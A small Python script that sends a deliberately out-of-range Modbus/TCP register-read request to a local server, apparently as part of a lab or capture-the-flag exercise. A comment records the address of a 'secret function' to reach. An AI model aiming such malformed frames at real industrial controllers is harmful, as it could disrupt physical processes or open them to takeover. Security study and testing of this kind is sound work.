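import socket
import struct
import time
from binascii import *

HOST = '127.0.0.1'  # The remote host
PORT = 1502  # The same port as used by the server
BUFFER_SIZE = 1000  # recv() buffer size for the (currently commented-out) response read

# Modbus/TCP frame layout used here: a 7-byte MBAP header (transaction id,
# protocol id, length, unit id) followed by the PDU (function code, starting
# address, quantity), every field big-endian.  struct.pack builds it.
MBAP_LENGTH = 6  # byte count that follows the length field: unit id + 5-byte PDU

# Parameters of the request sent by main().
unitId = 5
functionCode = 4  # Read Input Registers
startRegister = 255
numRegister = 132
# NOTE: the Modbus application protocol caps the quantity for function 4 at
# 125 (0x7D); a conformant server answers an out-of-range quantity with an
# exception response (ILLEGAL DATA VALUE, code 0x03) rather than honouring it.
# Original author's note: starting address of secret function : 0x08048f30

# Earlier test runs, kept from the original for reference:
# unitId = 16 ; functionCode = 17 ; coilId = 1
# req = struct.pack('>9H', 0,0,6, int(unitId), int(functionCode), 0x00, int(coilId), 0xff, 0x00)
# unitId = 5 ; functionCode = 5 ; coilId = 256
# req = struct.pack('>9bH3B', 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, int(unitId), int(functionCode), 0x00, coilId, 0xf1, 0xf1, 0x02)


def build_request(unit_id, function_code, start_register, num_register):
    """Return the raw 12-byte Modbus/TCP frame for a register read request.

    Args:
        unit_id: unit identifier (one byte).
        function_code: Modbus function code (one byte).
        start_register: starting address (two bytes).
        num_register: quantity of registers (two bytes).

    Returns:
        bytes: MBAP header (tid=0, pid=0, length=6, uid) followed by the PDU.

    Raises:
        struct.error: when a field does not fit its width or is not an int.
    """
    # int() keeps the original's tolerance for string-valued parameters.
    return struct.pack('>3H 2B 2H', 0, 0, MBAP_LENGTH, int(unit_id),
                       int(function_code), int(start_register), int(num_register))


def main():
    """Connect to HOST:PORT and send the request built from the module parameters."""
    req = build_request(unitId, functionCode, startRegister, numRegister)
    # 'with' closes the socket on every path; the original never closed it.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((HOST, PORT))
        # sendall() retries partial writes, which a bare send() would drop silently.
        sock.sendall(req)
        # print(req)
        # rec = sock.recv(BUFFER_SIZE)
        # print("RX: (%s)" %rec)


if __name__ == "__main__":
    main()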